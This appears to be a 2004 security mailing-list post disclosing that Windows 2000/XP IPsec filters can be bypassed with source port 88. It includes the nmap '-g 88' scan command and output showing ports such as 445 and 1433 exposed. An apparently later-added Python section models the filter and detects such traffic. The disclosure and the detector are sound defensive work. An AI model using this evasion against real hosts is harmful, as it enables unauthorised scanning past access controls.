IPsec Filters Used by Windows 2000 & XP
Hi folks,

As a result of a recent Windows host hardening engagement I was looking at, I came across this little trick and thought it might be useful at some point. The Microsoft IPSEC filters used by Windows 2000 & XP can be bypassed by choosing a source port of 88 (Kerberos).

First off, Microsoft themselves state that IPSEC filters are not designed as a full-featured host-based firewall [1], and it is already known that certain types of traffic are exempt from IPSEC filters [2]. They can be summarised as:
* Broadcast
* Multicast
* RSVP
* IKE
* Kerberos

In a Microsoft support note [2] there is the line: "The Kerberos exemption is basically this: if a packet is TCP or UDP and has source or destination port = 88, permit."
The test host here has a "block all" rule, created using:

ipsecpol.exe -x -w reg -p "the black knight" -r "noneshallpass" -n block -f 0=*::*
Normal nmap scan:

# nmap -sS -v -v -P0 --initial_rtt_timeout 10 --max_rtt_timeout 20 172.25.0.14

Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-05-19 18:14 BST
Host 172.25.0.14 appears to be up ... good.
Initiating SYN Stealth Scan against 172.25.0.14 at 18:14
The SYN Stealth Scan took 7 seconds to scan 1659 ports.
Interesting ports on 172.25.0.14:
(The 1658 ports scanned but not shown below are in state: filtered)
PORT   STATE  SERVICE
88/tcp closed kerberos-sec

Nmap run completed -- 1 IP address (1 host up) scanned in 7.017 seconds
Port 88 closed is the hint. nmap again, using this source port:

# nmap -sS -v -v -P0 -g 88 --initial_rtt_timeout 10 --max_rtt_timeout 20 172.25.0.14

Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-05-19 18:14 BST
Host 172.25.0.14 appears to be up ... good.
Initiating SYN Stealth Scan against 172.25.0.14 at 18 ..
Interesting ports on 172.25.0.14:
(The 1653 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1027/tcp open  IIS
1433/tcp open  ms-sql-s

Nmap run completed -- 1 IP address (1 host up) scanned in 0.367 seconds
As can be seen, the IPSEC filters are bypassed. Although not designed as a host-based firewall, IPSEC filters are being used as such, particularly to block popularly attacked ports such as NetBIOS, CIFS and SQL, perhaps as [temporary] worm mitigation.

In Windows 2003 all of these default exemptions have been removed, with the exception of IKE [1], and I believe that this may be incorporated into earlier Windows versions at some point.
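To make the quoted exemption rule and the gap it opens concrete from the defender's side, here is an added Python example (not code from the original post or from Microsoft). It models a "block all" IPsec policy with and without the Kerberos exemption, then runs a small detector over constructed connection-log lines that flags source-port-88 traffic which does not look like real Kerberos. The log format, the addresses other than the test host 172.25.0.14, and the KDC list are assumptions made for the example.

```python
# Added example, not code from the original post. It models the filter logic the
# support note quotes ("tcp or udp with source or destination port 88 -> permit")
# on top of a "block all" policy, and runs a small detector over constructed
# connection-log lines. Log format, host addresses other than the test host
# 172.25.0.14, and the KDC list are all assumptions made for the example.
import re
from dataclasses import dataclass
from typing import FrozenSet, Iterable, List, Optional

KERBEROS_PORT = 88


@dataclass(frozen=True)
class Packet:
    proto: str       # "tcp" or "udp"
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


def kerberos_exempt(pkt: Packet) -> bool:
    """The default Kerberos exemption exactly as the support note describes it."""
    return pkt.proto in ("tcp", "udp") and KERBEROS_PORT in (pkt.src_port, pkt.dst_port)


def ipsec_filter_decision(pkt: Packet, default_exempt: bool) -> str:
    """Decision of a 'block all' IPsec policy.

    default_exempt=True models Windows 2000/XP, where the Kerberos exemption is
    evaluated before the block rule; False models the Windows 2003 behaviour
    described in the post (Kerberos no longer exempt; IKE is not modelled here).
    """
    if default_exempt and kerberos_exempt(pkt):
        return "permit"
    return "block"


# Assumed log format: "<date> <time> <proto> <src_ip>:<src_port> -> <dst_ip>:<dst_port>"
LOG_RE = re.compile(
    r"^\S+ \S+ (?P<proto>tcp|udp) (?P<sip>[\d.]+):(?P<sport>\d+) -> (?P<dip>[\d.]+):(?P<dport>\d+)$"
)


def parse_log_line(line: str) -> Optional[Packet]:
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    return Packet(m["proto"], m["sip"], int(m["sport"]), m["dip"], int(m["dport"]))


def suspicious_port88(pkts: Iterable[Packet], known_kdcs: FrozenSet[str]) -> List[Packet]:
    """Flag traffic that rides the exemption but does not look like Kerberos.

    Real Kerberos traffic is client:ephemeral -> KDC:88 and KDC:88 -> client:ephemeral.
    Source port 88 from a host that is not a KDC, or source port 88 aimed at a
    well-known service port, matches neither direction and is worth an alert.
    """
    flagged = []
    for p in pkts:
        if p.src_port != KERBEROS_PORT:
            continue
        not_a_kdc = p.src_ip not in known_kdcs
        to_service_port = p.dst_port < 1024 and p.dst_port != KERBEROS_PORT
        if not_a_kdc or to_service_port:
            flagged.append(p)
    return flagged


# Constructed sample: two legitimate Kerberos packets, two source-port-88 probes
# at the test host from the post, and one ordinary SYN that the policy blocks.
SAMPLE_LOG = """\
2004-05-19 18:14:01 tcp 172.25.0.50:1037 -> 172.25.0.10:88
2004-05-19 18:14:01 tcp 172.25.0.10:88 -> 172.25.0.50:1037
2004-05-19 18:14:02 tcp 172.25.0.99:88 -> 172.25.0.14:445
2004-05-19 18:14:02 tcp 172.25.0.99:88 -> 172.25.0.14:1433
2004-05-19 18:14:03 tcp 172.25.0.99:40211 -> 172.25.0.14:445
"""
KNOWN_KDCS = frozenset({"172.25.0.10"})  # assumed domain controller address


def load_sample() -> List[Packet]:
    pkts = [parse_log_line(line) for line in SAMPLE_LOG.splitlines()]
    return [p for p in pkts if p is not None]


if __name__ == "__main__":
    for p in load_sample():
        print(f"{p.src_ip}:{p.src_port} -> {p.dst_ip}:{p.dst_port}  "
              f"win2000/xp={ipsec_filter_decision(p, True)}  "
              f"win2003={ipsec_filter_decision(p, False)}")
    for p in suspicious_port88(load_sample(), KNOWN_KDCS):
        print(f"ALERT: source port 88 from {p.src_ip} towards {p.dst_ip}:{p.dst_port}")
```

Running it shows the two probes with source port 88 being permitted by the modelled Windows 2000/XP policy while the same policy without the exemption blocks them, and the detector raising on exactly those two lines but not on the genuine client/KDC exchange. The KDC allow-list matters: without it a real KDC replying from port 88 would be flagged on every ticket request.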
Cheers, JJ
[1] http://support.microsoft.com/default.aspx?scid=kb;en-us;810207
[2] http://support.microsoft.com/default.aspx?scid=kb;en-us;253169